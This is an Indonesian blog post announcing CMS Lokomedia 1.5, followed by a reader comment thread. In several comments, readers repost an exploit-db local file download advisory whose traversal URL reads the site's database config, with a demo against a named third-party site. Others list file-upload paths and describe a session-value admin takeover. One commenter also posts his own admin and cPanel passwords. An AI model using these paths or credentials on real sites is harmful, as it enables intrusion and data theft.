Update CMS Lokomedia 1.5

Sembari menunggu buku Trik Dahsyat Menguasai AJAX dengan jQuery terbit, saya akan share dulu salah satu proyek yang disertakan dalam buku tersebut, yaitu update terbaru CMS Lokomedia 1.5. Pada versi 1.5, intinya hanya perbaikan bug .htaccess agar pengisian form komentar berita tidak error
(thanx to Husada) dan penambahan sebuah templates baru bername eljQuery 2, dimana didalamnya terdapat fitur-fitur sebagai berikut:

  • Headline slideshow menggunakan plugin FeaturedSlider yang lebih keren dari sebelumnya.
  • Penggunaan plugin dari http://apycom.com/ untuk Dropdown Menu yang lebih fleksibel, namun tetap tampil cantik.
  • Penggunaan plugin jQuery Lightbox untuk Preview Gambar dan Galeri Foto, dijamin lebih mantab tampilannya. Anda bisa mencobanya dengan meng-klik salah satu gambar di bagian Galeri Foto yang ada di halaman utama. Atau di halaman Galeri Fotonya langsung yang beralamat di: http://cms.bukulokomedia.com/album-21-kartun.html, silahkan klik salah satu fotonya.
Demonya bisa dinikmati di:
http://cms.bukulokomedia.com

Dan link downloadnya ada di:
http://bukulokomedia.com/lokomedia-1.5.rar

Salam Hangat,
Lukmanul Hakim

Baca Juga

337 Komentar

  • Hostmain-Murah | 20 Maret 2011 - 05:26:53 WIB

    PERTAMAX....Mahal

    Mantap Pak Lukman, sembari menunggu buku Trik Dahsyat Menguasai AJAX dengan jQuery, ane cicipi updatean terbaru CMS Lokomedia 1.5.

    Bravo Lokomedia!

  • penggemar buku lokomed | 20 Maret 2011 - 08:24:57 WIB

    Hidup !!! buku lokomedia...ijin sedot ya mas lukman...

  • wahyu | 20 Maret 2011 - 08:51:48 WIB

    alhamdulillah... update lagi...
    toko onlinenya kapan rilis updatenya pak lukman? :)

    ijin sedot ya...

  • hendra | 20 Maret 2011 - 09:17:22 WIB

    TRIMAX...lebih mahal

    mantap, toko onlinenya om kpn

  • andrea Adelheid | 20 Maret 2011 - 09:32:26 WIB

    pejWANNNN....

    hhahaha

  • luki mulyanto | 20 Maret 2011 - 09:42:42 WIB

    wah ada updatan terbaru....ijin download jg nih

  • Riswan | 20 Maret 2011 - 10:06:20 WIB

    wow....keren. baru mau nyoba eh sudah release versi 1.5....benar benar inovatif. Bravo mas Lukman, Bravo Lokomedia

  • yudi guntur | 20 Maret 2011 - 10:14:09 WIB

    mantappss......sukes mas...

  • ronal | 20 Maret 2011 - 13:39:27 WIB

    ajaib om lukman tambah keren aj ni...gw tambah semangat ni koleksiin buku2 om lukman kpn om nyampe di jkt nie bukunya....hhehehhehe

  • Komaruddin - virus13 | 20 Maret 2011 - 13:51:23 WIB

    Lanjut...

  • Arif Hidayatullah | 20 Maret 2011 - 14:08:46 WIB

    Mantabbbbsss

  • Husada | 20 Maret 2011 - 14:22:30 WIB

    @Mas Lukman: kalau untuk Dropdown Menu Apycom, masih cantikan website ku bisa dicoba dech, menu hovernya bisa sliding, btw TOP dech
    Boleh diikutkan lomba tamplate gak ya? hehehe

  • muhamad asmuni | 20 Maret 2011 - 17:02:19 WIB

    super keren...
    toko onlinenya kasih jquery donk Om...

  • Komaruddin - virus13 | 20 Maret 2011 - 17:16:27 WIB

    tolong diperbaiki
    http://localhost/folderapasaja/adminweb/media .php?module=sekilasinfo
    ketika hapus sekilas info; ada error

    -----o-----o-----o-----

    Warning: unlink(../../../foto_info/news3.jpg) [function.unlink]: No such file or directory in C:\xampp\htdocs\folderapasaja\adminweb\modul\mod_seki lasinfo\aksi_sekilasinfo.php on line 14

    Warning: unlink(../../../foto_info/small_news3.jpg) [function.unlink]: No such file or directory in C:\xampp\htdocs\folderapasaja\adminweb\modul\mod_seki lasinfo\aksi_sekilasinfo.php on line 15

    Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\folderapasaja\adminweb\modul\mod_seki lasinfo\aksi_sekilasinfo.php:14) in C:\xampp\htdocs\folderapasaja\adminweb\modul\mod_seki lasinfo\aksi_sekilasinfo.php on line 20

    -----o-----o-----o-----
    hehe
    file name dibuat kecil
    tapi yang dihapus small
    wkwkwk
    khilaf yah...
    semangat...

  • Komaruddin - virus13 | 20 Maret 2011 - 18:26:04 WIB

    unlink("../../../foto_berita/$_GET[namafile]");
    unlink("../../../foto_berita/small_$_GET[namafile]&quo t;);

    C:\xampp\htdocs\lokomedia\adminweb\modul\mod_ berita\aksiberita.php

    yang medium lupa dihapus yah.? :P
    masak cuma file asli dan small

    saran aja...
    konsisten bahasa indonesia yah
    jangan pakek small & medium
    tapi pakek kecil & sedang hehe... :P
    I Love Indonesia...!!!

  • child crew | 20 Maret 2011 - 19:11:44 WIB

    we love lokomedia, :-D

  • child crew | 20 Maret 2011 - 19:13:05 WIB

    we love bukulokomedia.,, :-D

  • child crew | 20 Maret 2011 - 19:14:19 WIB

    we love bukulokomedia.com..,, :-D

  • romi | 20 Maret 2011 - 20:28:34 WIB

    akhirnya keluar juga nih updatennnyaa..

  • putra | 20 Maret 2011 - 21:46:05 WIB

    mantap, , , ,
    semoga bukunya cepat kelar

  • eidelweiss | 20 Maret 2011 - 22:23:18 WIB

    Hm.. pak admin.. saya tidak tahu bagaimana mengontak anda.. saya hanya ingin memberitahukan bahwa di versi 1.5 ini masih terdapat bug yg sangat berbahaya..

    bug type: Arbitary file upload vulnerability

    with a default configuration of script in FCKeditor , an attacker might be able to upload arbitrary files containing malicious PHP code in jpg file due to multiple file extensions isn't properly checked.

    and also because no security or login required there.. ofcourse this vulnerability can be used or exploited by anonymous user.

    regards,
    eidelweiss.

  • hendra | 20 Maret 2011 - 22:52:32 WIB

    all : karena nuggu updatean toko online ga muncul2
    saya mencoba update sendiri berikut hasilnya yang saya kerjakan di 20 march ini( seharian pulll)

    menambah modul artikel/blog(dinamis)
    menambah modul chatbox+ captha(dinamis)

    silahkan dicek,tpi blm selesai tuh kapan2 dilanjutin lagi heee

    http://tokoaslionline.com/

  • eidelweiss | 20 Maret 2011 - 22:56:41 WIB

    mas hendra..

    maaf sebelum nya kalau saya lancang..
    tapi setelah saya analisys..
    website mas juga terkena dampak dari vulnerability yg saya jelaskan sebelum nya di atas..

    details vulnerability akan segera publish di www.packetstormsecurity.org/files/author/eidelweiss atau di www.exploit-db.com

  • hendra | 20 Maret 2011 - 23:05:33 WIB

    makasi mas infonya, apa itu mas???

  • firmansyah wahyudiarto | 21 Maret 2011 - 00:18:11 WIB

    semakin mantap saja CMS lokomedia ini...

  • Joris | 21 Maret 2011 - 01:02:38 WIB

    Minta donk header website lokomedia yg *.psd

    Biar bisa diedit lebih gampang....

  • lokomediaonline | 21 Maret 2011 - 10:09:26 WIB

    CMS Lokomedia Local File Download Vulnerability:

    [!]================================== =========================================[!]

    [~] CMS Lokomedia Local File Download Vulnerability
    [~] Author : Xr0b0t (xrt.interpol@gmx.us)
    [~] Homepage : http://www.indonesiancoder.com | http://xrobot.mobi | http://mc-crew.net
    [~] Date : 16 Mei, 2010

    [!]==================================================== =======================[!]

    [ Software Information ]

    [+] Vendor : http://bukulokomedia.com/home
    [+] Price : free
    [+] Vulnerability : LFD
    [+] Dork : inurl:"*.php?file=" ;)
    [+] Version : all version

    [!]==================================================== =======================[!]

    [ Vulnerable File ]
    http://127.0.0.1/path/downlot.php?file=[LFD]



    [ XpL ]

    http://127.0.0.1/path/downlot.php?file=../config/koneksi.ph p

  • lokomediaonline | 21 Maret 2011 - 10:10:38 WIB

    lanjutan:

    [ d3m0 ]

    http://www.saifulisnandar.web.id/downlot.php?file=../config /koneksi.php

    etc etc etc ;]

    [!]==================================================== =======================[!]

    [ Thx TO ]

    [+] Don Tukulesto DUDUl Kok G rene2...
    [+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber
    [+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru, gonzhack,senot
    [+]Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMer ah.IBL13Z,r3m1ck
    [+]Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha,Gen i212


    [ NOTE ]

    [+] OJOK JOTOS2an YO ..
    [+] Minggir semua Arumbia Team Mau LEwat ;)
    [+] MBEM : lup u :">

    [ QUOTE ]

    [+] INDONESIANCODER still r0x...
    [+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat ..
    [+] Malang Cyber Crew & Magelang Cyber Community

    Info dari: http://www.exploit-db.com/exploits/17002/

  • Andrea Adelheid | 21 Maret 2011 - 10:51:22 WIB

    ^ waduh ada om tukul from IDC.. xixixixi

  • olien | 21 Maret 2011 - 11:23:42 WIB

    ijin unduh ya!!!

  • khwatir | 21 Maret 2011 - 13:00:32 WIB

    mas lukman dan sapa aja yang bisa:
    1.kasih tau dong kelemahyannya dimana?
    2.kasih tau cara defance/protectnya?
    kalau saya tau carnya uda saya share pastinya, ilmu yang berharga adalah ilmu yang diamalakan dan akan terus mengalir ketika ilmu itu trus digunakan orang lain

  • saran.com | 21 Maret 2011 - 13:40:37 WIB

    Pak lukman mau kasih saran nih,
    1. tolong untuk form pencarian agar di validasi, jadi apabila belum di memasukan kata yang di cari maka tidak ada berita yang di hasilkan.
    2. Begitu pula untuk hasil poling untuk di validasi, agar ketika di refresh jumlah voting tidak bertambah.

    Terima kasih.

    Salam sukses.

  • Simri | 21 Maret 2011 - 13:51:25 WIB

    Gmana kalo bung eidelweis share ngatasin kelemahannya di sini? Ayo... Bagi ilmunya buat teman2 yg lain, gak bakalan neysell kalo bagi2 ilmu...

  • husada | 21 Maret 2011 - 14:29:32 WIB

    @lokomediaonline: seingatku itu kasus lama, file downlot.php sdh diupdate, krn sdh ada proteksi thdp file2 yg bs didownload.

  • dodo | 21 Maret 2011 - 15:01:00 WIB

    simri : betul tuh..
    husada: coba tanyakan lagi ms mungkin ada celah lainnya jangan sampe ntr gara2 ini menghambat perkembagan CMS lokomedia...



  • husada | 21 Maret 2011 - 15:43:40 WIB

    @edelweis: melihat penjelasanmu, arbitary file upload vulnerability kaitannya dg script di FCKeditar yg emang versi lamanya rentan. Tp saat ini CMS LOKOMEDIA pake tinymcpuk utk texteditornya. Aku gak tau apa tinymcpuk jg vulnerable? Ada analisanya?

  • darwis effendi | 21 Maret 2011 - 16:14:47 WIB

    all guest : saya mau tanya bagaimana buat banner iklan seperti di kompas, banner iklan terlebih dahulu baru konten web...

  • bayu | 21 Maret 2011 - 16:26:08 WIB

    kok gak ada databasenya ya?

  • sandy | 21 Maret 2011 - 17:10:40 WIB

    saya mohon bantuan donk...ceritanya saya kan upload cms lokomedia di server (sudah di onlinekan) tapi kenapa ya halaman administratornya tidak berfungsi dengan baik setiap saya mo melakukan aktifitas seperti add, edit, dll hasilnya selalu muncul pesan

    You don't have permission to access /tes/adminweb/modul/mod_halamanstatis/aksi_halamanstatis.ph p on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

    kira2 apa yang harus saya lakukan rekan2 sekalian ...apa harus ada yang saya setting....

    terima kasih

  • Info-ku | 21 Maret 2011 - 17:35:29 WIB

    mas liukman, mas husada, dll

    disitukan dibilangnya dengan stus nada EMERGENCY dimana isinya "1.5 ini masih terdapat bug yg sangat berbahaya" jadi gmana nih masa didiemin aja...

    bagi edelwis tolong kasi tau dong dimananya apa saja yang harus dilakukan

  • Ade | 21 Maret 2011 - 18:04:59 WIB

    tak lupa untuk absen pak lukman..
    hehehe

  • Ade | 21 Maret 2011 - 18:08:31 WIB

    Oh ya sekalian kunjungi disni juga ya??... www.bacain.info

  • husada | 21 Maret 2011 - 18:57:44 WIB

    @infoku n all: kan udah dijelasin, rentannya itu pd texteditor FCKeditor yg mana versi lamanya rentan dijebol, sdgkan cms lokomedia pake TINYMCPUK utk textare di adminwebnya. Yg ingin aku tau, apa TINYMCPUK JG VULNERABLE? Klo gak, So what gtu lho? Analisa itu bs benar, bs salah, msh perlu bukti. Skrg lbh baik cari info ttg masalah tsb. Jd ndak ndak di diemin,

  • Welly | 21 Maret 2011 - 21:09:13 WIB

    Mantap ... uda Update lagi ....

  • auto magazine | 21 Maret 2011 - 21:10:13 WIB

    Auto Trends Magazine contains include information about new car and used car,concept car review,car insurance and automobile accessories from all brands

  • kiwil 4 kiwil studio | 21 Maret 2011 - 21:22:57 WIB

    @all :
    saya mau share sbuah script php yg mgkn sgt dibutuhkan utk compress tampilan web selain menggunakan gz_handler script ini yaitu utk auto detect fungsi compress, coz pengalaman sndiri, kl misal menggunakan xampp yg update terbaru, di tampilan web lokomedia ada keterangan encoding error.
    scriptnya adl sbb :

  • kiwil 4 kiwil studio | 21 Maret 2011 - 21:23:26 WIB

    lanjutan :

    function percepatAkses(){
    /*
    if (substr_count($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip'))ob_start("ob_gzhandler");
    else ob_start();
    */
    $HTTP_ACCEPT_ENCODING = $_SERVER["HTTP_ACCEPT_ENCODING"];
    if( headers_sent() )
    $encoding = false;
    else if( strpos($HTTP_ACCEPT_ENCODING, 'x-gzip') !== false )
    $encoding = 'x-gzip';
    else if( strpos($HTTP_ACCEPT_ENCODING,'gzip') !== false )
    $encoding = 'gzip';
    else
    $encoding = false;

  • kiwil 4 kiwil studio | 21 Maret 2011 - 21:23:43 WIB

    lanjtan :

    if( $encoding )
    {
    $contents = ob_get_clean();
    $_temp1 = strlen($contents);
    if ($_temp1 < 2048) // no need to waste resources in compressing very little data
    print($contents);
    else
    {
    header('Content-Encoding: '.$encoding);
    print("\x1f\x8b\x08\x00\x00\x00\x00\x00") ;
    $contents = gzcompress($contents, 9);
    $contents = substr($contents, 0, $_temp1);
    print($contents);
    }
    }
    else
    ob_end_flush();
    }
    percepatAkses();

    silahkan mencoba ^_^

  • kiwil 4 kiwil studio | 21 Maret 2011 - 21:34:03 WIB

    @all :
    mgkn aku ada sedikit saran mengenai editor webnya, saranku lebih baik pakai CKEditor ( http://ckeditor.com ) dari pada tinyCmpuk coz ckeditor selalu update dan banyak lg keuntungannya ( bukan promosi lho ^_^ )
    lebih lnjut silahkan kunjungi webnya
    http://ckeditor.com

  • Izzoed Hatake | 22 Maret 2011 - 09:27:28 WIB

    Bisa minta file headernya yang masih .psd gak mas???? maturnuwun sebelumnya..... :)

  • Barayuda | 22 Maret 2011 - 09:27:50 WIB

    makasi atas update nya mas lukman..
    KEREN bgt.. :D

  • fatur | 22 Maret 2011 - 09:32:58 WIB

    bener-bener mantap mas bro.. sukses buat mas lukman sekeluarga
    dan sukses juga buat temen-temen semua...

  • Simri | 22 Maret 2011 - 12:27:58 WIB

    #Husada: Kayaknya penjelasan eidelweis itu dia jelasin di websitenya dia: http://www.eidelweiss-advisories.blogspot.com/
    Tapi saya gak begitu paham dengan itu.
    #kiwil: kalo menurut pnjlasan mas Husada, tinyCmpuk bagus, sdngkan mas kiwil blng ckeditor... He..he..jd bingung yg baru belajar... Tp thx bnget buat semua udh mau share.

  • Marten | 22 Maret 2011 - 16:31:23 WIB

    sedikit share modul database

    extrak di dalam folder modul
    http://marten.aristarkus.com/mod_database.zip
    l alu add modul di manajemen modul
    modul tsb bisa backup dan restore database, nantinya akan ada scheduled task.

  • Husada | 22 Maret 2011 - 18:12:05 WIB

    @simri: dengan path spt ini:

    http://host/path_to_lokomedia/tinymcpuk/filemanager/browser .html
    or
    [!] http://host/tinymcpuk/filemanager/browser.html
    or
    htt p://host//tinymcpuk/filemanager/frmupload.html
    or
    ht tp://host/path_to_lokomedia/tinymcpuk/filemanager/frmuploa d.html

    akan muncul form untk upload file tp aku sdh coba dilocalhost ,gak bisa upload?! gak tau lagi bagi hacker, mungkin itu celah yg bisa dimanfaatkan

  • Hyan | 22 Maret 2011 - 19:38:54 WIB

    @ Lokomedia
    Mana Konfirmsi darimu di tanyain banyak temen temen tu lho...
    maju terus indonesia open source

  • Joko | 22 Maret 2011 - 21:07:45 WIB

    Salut ma lokomedia... moga makin sukses...

  • Dayat | 22 Maret 2011 - 22:20:25 WIB

    Mas klo blh saya minta tlg dkrimi tutorial Proyek membangun CMS tanpa OOP yg versi komplit,cz mw belajar dr awal dlu..hee
    Ni almt emailQ b4yan6an.1412@gmail.com
    Thank's sebelume. . .

  • Bayu | 23 Maret 2011 - 05:21:20 WIB

    Mas Lukman kula ijin sedot nggih
    suwun kagem partisipasinipun wonten ing open source :D

  • warifw | 23 Maret 2011 - 07:54:06 WIB

    @ mas kiwil
    klu pakai ckeditor gimana caranya install,
    share disini dunk... :) atau email saya ke warifw@gmail.com. terima kasih atas sarannya

  • wafi | 23 Maret 2011 - 10:27:17 WIB

    mantap surantap ....

  • eidelweiss | 23 Maret 2011 - 10:27:24 WIB

    @all: sorry baru bisa ol..

    check this out

    http://packetstormsecurity.org/files/view/99556/cmslokomedia-shell.txt

    tinyCmpuk bebasis fckeditor versi lama klw saya tidak salah.. ok permision yg di upload picture only.. tapi apa kah pernah or sudah mendengar tentang backdoor php yg di hexa dan ber extension image like jpg or gif ?

  • eidelweiss | 23 Maret 2011 - 10:52:29 WIB

    dengan sedikit kreasi dari attacker.. dengan menjalankan code di bawah ini akan mengexploitasi vulnerability tersebut:

    wah saya paste code nya malah kepanjangan Qe³..
    saya upload di sini aja dech:

    http://www.portaneo.com/userfiles/file/lokomedia.txt

  • cahyockg | 23 Maret 2011 - 17:54:05 WIB

    Mau tanya gimana caranya menambahkan modul baru di cms lokomedia dan membuat link ke modul baru tersebut...mohon penjelasan teman2..terima kasih

  • wesley | 23 Maret 2011 - 18:33:16 WIB

    top markotop.. skripnya udah ngasilin 7 jt lebih cuma buat 2 web doang

  • Komaruddin - virus13 | 23 Maret 2011 - 20:48:49 WIB

    Catatan buat lokomedia
    1.
    pada modul admin album --> aksialbum.php
    line 71 --> window.location=('../../media.php?modul=berita')& lt;/script>";
    seharusnya --> window.location=('../../media.php?modul=album')&l t;/script>";

    2.
    pada modul admin hubungi kami
    kok cuma subject saja yang ditampilkan.?
    padahal isi pesannya seharusnya ditampilin juga kan..!!

  • putra | 23 Maret 2011 - 22:22:54 WIB

    @marten mantap mas, saya harap mas bisa share update yang mas buat sendiri untuk CMS Lokomedia kepada semua pecinta CMS Lokomedia

    sukses selalu mas

  • putra | 23 Maret 2011 - 22:24:33 WIB

    @marten mantap mas modul backup databasenya, saya harap mas bisa share update yang mas buat sendiri untuk CMS Lokomedia kepada semua pecinta CMS Lokomedia

    sukses selalu mas

  • Fuad indra s | 24 Maret 2011 - 05:02:04 WIB

    mas coba pada searchnya ditambah yg aoutocomplate...supaya lebih mantap...

  • arieve | 24 Maret 2011 - 05:35:56 WIB

    Pak Lukman buka tmpat kursusan gak...?
    pngen bLajar web pak..

  • Ridho | 24 Maret 2011 - 05:56:47 WIB

    Apa pun kata teman2 di atas,,,
    Saya bangga dengan CMS Lokomedia,,,
    Terimakasih Pak Lukman dan Kawan-kawan,,,

  • Nasro | 24 Maret 2011 - 07:36:03 WIB

    Wah ini bagus bget CMS updatetanya..... jd semangat lgi bljrnya. thax pak lukman

  • husada | 24 Maret 2011 - 08:41:50 WIB

    @all: solusi utk masalah arbitrary file upload vulnerability TINYMCPUK, cukup simple, ganti aja folder tinymcpuk dg nama lain, dg begitu tdk bs diakses langsung pathnya

  • Agus Saputra | 24 Maret 2011 - 08:42:22 WIB

    Pengunjung setia http://agussaputra.co.cc/, tepat hari ini situs tersebut akan dialihkan ke url: http://www.agussaputra.com/.. (memakai domain .com), mengingat pengunjung web sudah mulai banyak, shg perlu adanya peningkatan dari sisi domain dan server hosting (karena yg gratisan suka down server-nya :-D) jadi nanti kunjungi saja ya www.agussaputra.com.. namun saat ini masih tahap maintenance ulang. karena data yg ada di server lama-nya hilang dan tidak bisa diambil, jadi sedikit-sedikit saya akan memasukkan ulang data .. :-)
    thx. Agus Saputra

  • Rizal | 24 Maret 2011 - 11:18:06 WIB

    thanks om Lukman atas update-nya...

    sambil nunggu update toko lokomedia yg baru
    mampir ya ke sample toko online sy yg baru

    http://rizalonline.morganhosting.co.cc/griyagaya/store

  • onixgwtel | 24 Maret 2011 - 16:49:10 WIB

    saya mau menambah menu utama pada lokomedia 1.5, menunya kok bisa kebawah ya please sarannya.kalo mau ngerubah CSS dimana nya yg harus diganti.

  • onixgwtel | 24 Maret 2011 - 16:50:21 WIB

    saya mau menambah menu utama pada lokomedia 1.5, menunya kok bisa kebawah ya please sarannya.kalo mau ngerubah CSS dimana nya yg harus diganti.

  • kiwil 4 kiwilstudio | 24 Maret 2011 - 20:11:53 WIB

    @simri :
    Semua editor itu bagus, tapi itu semua tergantung ke kita cocoknya yg mana, coz kl aq cocoknya di CKEditor coz kl pke tinycmpuk aq pernah mengalami beberapa touble pada saat coding stylenya

    @ warifw :
    caranya hampir sama kaya confignya tinycmpuk :
    1. ekstrak file downloadnya ke project lokomedia misal tempat ekstraknya : config/ckeditor

    2. Buka media.php utk halaman admin, kemudian di antara <head> dan </head> masukkan kode pemanggil kodenya <script type="text/javascript" src="../config/ckeditor/ckeditor.js"></scri pt>

    3.dan lihat apa yg terjadi ^_^

    http://kiwilstudio.com

  • yohanes | 25 Maret 2011 - 08:11:10 WIB

    Mantap updateannya, terima kasih telah menshare ya :-)

  • Rofi | 25 Maret 2011 - 10:55:21 WIB

    mas lukman, sy minta tolong, ada kendala pada cms yg saya gunakan,
    pada adminweb/hubungi kami, ketika balas email, kok gak terkirim, mohon bimbingannya...

    email : kambing.rofi@gmail.com

  • Rofi | 25 Maret 2011 - 12:11:56 WIB

    mas lukman, ada lagi ne..
    gimana caranya nambah modul, apa manual ato tinggal di admin?
    ceritanya saya mo nambah menu ne, masak pake halaman statis?
    tolong ya mas......
    kambing.rofi@gmail.com

  • coffeeserial | 25 Maret 2011 - 16:49:42 WIB

    mmMMMmuuuuuuaaaaaannnnntttaaabb.......bb...bb...... IZIN sedot........ Pak LUkman

  • Nuris Akbar | 25 Maret 2011 - 21:19:28 WIB

    mas mau saya mau kasi saran.bagaimana kalau ketika memposting artikel nanti datanya divalidasi dahulu dan ketika menghapus data terdapat pesan sebelum menghapus?
    supaya terkesan lebih interaktif.
    terima kasih mas.

  • Agus Saputra | 25 Maret 2011 - 22:38:05 WIB

    Lokomediers @ URL baru, desain layout web juga baru.. kasih opini ya kawan jump to: http://www.agussaputra.com .. tq..

  • Andrea Adelheid | 26 Maret 2011 - 11:29:09 WIB

    <a href="http://laptopdiskon.com" />http://laptopdiskon.com/</a>

    Baru buat.. mohon masukan

  • Andrea Adelheid | 26 Maret 2011 - 11:29:40 WIB

    http://laptopdiskon.com

  • Azzahroe | 26 Maret 2011 - 12:10:11 WIB

    terima kasih buat update cms nya makin mantap :)

  • ronal | 26 Maret 2011 - 13:22:13 WIB

    andrea@mantap bro oia scroll produknya jgn di taro di headernya...mendingan di bawah header

  • lukman | 26 Maret 2011 - 14:17:39 WIB

    @ rizal: makin mantap aja kreasinya, ciamik bener templatenya.

    @ andrea adelheid: modifikasi yang kreatif.

    @ nuris akbar: terimakasih atas sarannya.

    @ rofi: penambahan modul dilakukan secara manual dan juga melalui admin.

  • lukman | 26 Maret 2011 - 14:26:23 WIB

    @ komaruddin - virus13: terimakasih telah melakukan testing terhadap update cms lokomedia terbaru ini, mohon dimaafin ya kawan-kawan saya saya banyak luput dan khilafnya.

    @ lokomediaonline: kalau masalah Local File Download Vulnerability sudah diperbaiki bugnya pada versi 1.4.1.

    @ eidelweiss: terus terang saya belum tau cara upload file melalui tinymcpuk, sementara ini pakai solusinya pak Husada aja dulu ya, ganti nama folder tinymcpuk-nya.

  • kiwil 4 kiwilstudio | 26 Maret 2011 - 20:29:47 WIB

    @all : teman2 kasih kritik dan saran ya untuk web project saya yg baru yang beralamat di http://inventingweb2.kiwilstudio.com/

    Trims ^_^
    NB :
    - Menggunakan Toko Online Lokomedia yang dimodifikasi
    - utk menu sub item dan finishing effect msh belum coding, hehehe ^_^

  • wahyu | 27 Maret 2011 - 06:21:12 WIB

    @kiwil : bagus desain n konsepnya.. klo dah jadi boleh di share tuh :-)

    *ngarep mode on*

  • ipan | 27 Maret 2011 - 12:52:15 WIB

    mas.. mau nanya nih... pada tampilan depan web ini kan http://bukulokomedia.com/home begitu.. kalo kpengen ngilangin kata "HOME" na gimna ya caranya?? makasih..

  • Marten | 27 Maret 2011 - 12:54:16 WIB

    Mas kiwil , jangan lupa untuk update keranjang nya di validasi , kalau diinputkan 0 dijadikan 1. :p

  • toko asli online | 27 Maret 2011 - 21:56:48 WIB

    datang yah ke http://tokoaslionline.com/ modifikasi dari toko hp online

  • www.kliksumbar.com | 28 Maret 2011 - 00:06:02 WIB

    CMS Lokomedia mantap

  • Nuris Akbar | 28 Maret 2011 - 09:07:54 WIB

    mas mau kasi saran ne :
    1.muncul peringatan ketika artikel dan sebagainya dihapus supaya terkesan lebih interaktif.
    2.jika artikel dihapus maka gambar yang berhubungan dengan arttikel tersebut juga harus ikut terhapus & begitu juga dengan gallery dan file download supaya bisa lebih menghemat space.
    3.admin hanya bisa memanipulasi artikelnya sendiri.
    4.artikel yang dihapus oleh admin akan bersetatus temp sehingga suatu saat bisa dikembalikan lagi ( ex seperti data yang terhapus dan masuk ke recyle bin ).
    5.super admin bisa melihat seluruh artikel dan bisa memanipulasinya.

    terima kasih mas.

  • dieq41 | 29 Maret 2011 - 10:31:03 WIB

    klo menurut saya pribadi, ada mslh di sessionnya, jadi value session msh bs diedit pake tools..
    jadi, misal saya login sbg user biasa dgn level "user", saat value dr session $_SESSION['leveluser'] diganti jadi admin, lgsg kebuka semua panel adminnya, termasuk change pasw real admin kan?..
    sebaiknya ditambah script tuk cek apakah value sessionnya msh sesuai (sama) dengan databse (usernya), klo udah ada perubahan bisa dilempar ke mode logout.

  • rifqi | 30 Maret 2011 - 07:43:27 WIB

    saya membuat modul baru, tapi kok tidak bisa diedit atau di delete modulnya gimana ya?

  • rifqi | 30 Maret 2011 - 08:19:40 WIB

    klo ada yg punya tutorial nambah modul kasih linknya dong, mksih

  • boypeace | 30 Maret 2011 - 08:31:58 WIB

    lubang cms lokomedia
    http://www.exploit-db.com/exploits/17014/
    r
    mohon untuk di corect

  • boypeace | 30 Maret 2011 - 08:38:41 WIB

    Salah satu lubang cms lokomedia 1.5 bisa dicoba

    http://www.ikafela.com./tinymcpuk/filemanager /browser.html

  • robby | 30 Maret 2011 - 12:18:31 WIB

    untuk module YM apakah belum tersedia? atau adakah yg bisa membantu untuk module YM?

  • echa | 30 Maret 2011 - 17:48:57 WIB

    selalu menawan...:)

  • denny | 30 Maret 2011 - 18:32:21 WIB

    klo ingin menampilkan banner bukan gambar or url tapi pake java scrip gmn caranya?mana yg harus di ganti

  • harun | 30 Maret 2011 - 18:54:00 WIB

    wah ckckck keamanan-kemanan parah...
    gmana nih....
    banyak bgt laporan celah di forum ga da solusi
    bgungg @_@
    mas luklman kayaknya harus update segera toko online dan blognya agar yang mau pake cms lokomedia ga ragu...

  • husada | 31 Maret 2011 - 11:29:41 WIB

    @Boypeace & Harun: kami sudah jelaskan masalah tersebut, lihat penjelasan sebelumnya. saya sdh tes lubang tsb, baik di localhost maupun online, path tsb gak bisa dipakai utk upload scr langsung, boleh dech di tes sendiri aja. kalau ndak yakin ganti aja foler tnymcpuk dg nama lain dg begitu path tsb gak bisa diakses lagi?!

  • Rizal | 31 Maret 2011 - 12:11:39 WIB

    @husada

    dishare aja folder tinymcpuk nya....

  • Husada | 31 Maret 2011 - 14:46:43 WIB

    @Rizal: mengganti nama folder tnymcpuk sama seperti kalau kita ganti folder adminweb, hal itu dilakukan utk menyembunyikan kedua folder tsb agar hanya admin saja yang tau. inilah resiko CMS yang opensource, script2 banyak yang diketahui orang (programer) apalagi Hacker. sebenarnya yg aman adalah mengganti semua nama2 folder baik folder gambar ataupun nama2 filenya. tetapi utk masalah ini cukup ganti nama utk folder adminweb dan tnymcpuk dengan nama lain sudah cukup membantu dr segi keamanannya, maksudnya gitu? kalau masih takut ya gak usah pake CMS Lokomedia, GPP? hehehe, tapi itu namanya PENAKUT?! hehehe... guyon nih.. ojok serius2???

  • Rizal | 01 April 2011 - 10:59:38 WIB

    buat temen2 yg mo ganti tampilan font (.gdf) pada captcha halaman hubungi kami bisa langsung download di sini:

    http://www.lukedingle.com/scripts/php/dynamic-images/fonts/


    selamat mencoba !!

    http://rizalonline.morganhosting.co.cc/griyagaya/hubungi-kami.html

  • arya | 04 April 2011 - 15:13:46 WIB

    mohon bantuanna para master dan pecinta lokomedia...untuk paginggnya tidak bisa jalan ketika halaman 2 atau selanjutnya di klik...pada updatetan terbaru Update CMS Lokomedia 1.5

  • amin santoso | 04 April 2011 - 16:29:30 WIB

    ada yg bisa perbaiki web gua kagak?
    ini link front nya: http://aminews.freezoka.net/,
    ini link admin: http://aminews.freezoka.net/adminweb
    pass n name: admin

    ...d localhost jalan lancar2 saja, tetapi d hosting halamannya error pas d klik,,

    mau masuk ke cpanelnya http://cpanel.freezoka.net/
    email: amin_liauw@yahoo.co.id
    pass: bastard1

  • harun | 04 April 2011 - 22:01:05 WIB

    mas husada menaggapi masah tnymcpk kalau foldernya diganti nama pasti di editor adminya gambar fitur pada ga kelihatan semua nah solusinya gmana?apa ada penyesuaian lainya??

  • Husada | 05 April 2011 - 09:34:43 WIB

    @All: Kata Mas Lukman sebaik apapun aplikasi javasrippt/ jquery di website tetapi jika javascript di browser di disable, jadi percuma aja. oleh karena itu perlu diberikan peringatan agar diaktifkan. Apalagi CMS Lokomedia tamplate jquery, validasi formnya banyak menggunakan javascript kalau javascript di browser di disable, jadi jelek tampilannya dan validasinya gak berfungsi:
    untuk tes: disable javascript di browser komputer ANDA lalu kunjungi website ku:
    www.kbiharofahmalang.com
    atau
    www.belanja.kbih arofahmalang.com

